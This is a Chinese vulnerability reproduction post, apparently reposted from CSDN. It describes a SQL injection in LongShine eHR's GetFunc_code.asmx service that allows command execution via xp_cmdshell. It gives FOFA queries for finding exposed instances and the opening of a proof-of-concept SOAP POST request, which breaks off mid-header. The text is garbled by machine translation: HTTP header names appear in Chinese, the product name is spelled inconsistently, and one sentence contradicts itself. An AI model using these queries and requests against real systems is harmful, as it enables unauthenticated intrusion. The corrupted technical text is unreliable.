朗新天霁eHR GetFunc_code.asmx SQL注入致RCE漏洞复现

朗新天霁eHR GetFunc_code.asmx SQL注入致RCE漏洞复现0x01 产品简介
朗新天霁人力资源管理系统(LongShine eHR)是一款由北京朗新天霁软件技术有限公司研发的人力资源管理系统,该产品融合了国外先进的人力

0x01 产品简介

朗新eHR是北京朗新天机软件技术有限公司开发的人力资源管理系统。该产品融合了国外先进的人才管理理念和国内众多的人才管理实践,使其成为最全面、性价比最高的产品之一。中国有效的人力资源管理系统以其集成化、自动化、数据库化、移动化等特点,在企业管理中发挥着重要作用。不仅提高了企业的管理效率和水平,而且促进了员工和组织的发展,有力支撑了企业的可持续发展。

0x02 漏洞概述

朗信天机eHR中的GetFunc_code.asmx接口的多个实例(包括GetMessage、GetShortMessage和GetToken)包含SQL注入漏洞,可能允许未经身份验证的远程攻击者利用SQL注入漏洞执行任意命令并与数据库交互。服务器上的xp_cmdshell。经分析判断,该漏洞利用难度较大,建议您尽快修复。

0x03 复现环境

福法:

body=\’/default.aspx?ReturnUrl=%2f\’ body=\’silverlight\’

0x04 漏洞复现

概念验证-1

POST /ws/GetFunc_code.asmx HTTP/1.1

Host:你的IP

内容类型: 文本/xml; 字符集=utf-8;

内容长度: 长度

SOAPAction: \’http://tempuri.org/Get

#浪芯天机eHR 以上关于GetFunc_code.asmx中SQL注入导致RCE漏洞重现的相关内容由网络提供,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93035.html

(0)
CSDN's avatarCSDN
上一篇 2024年7月5日 上午5:37
下一篇 2024年7月5日 上午6:12

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注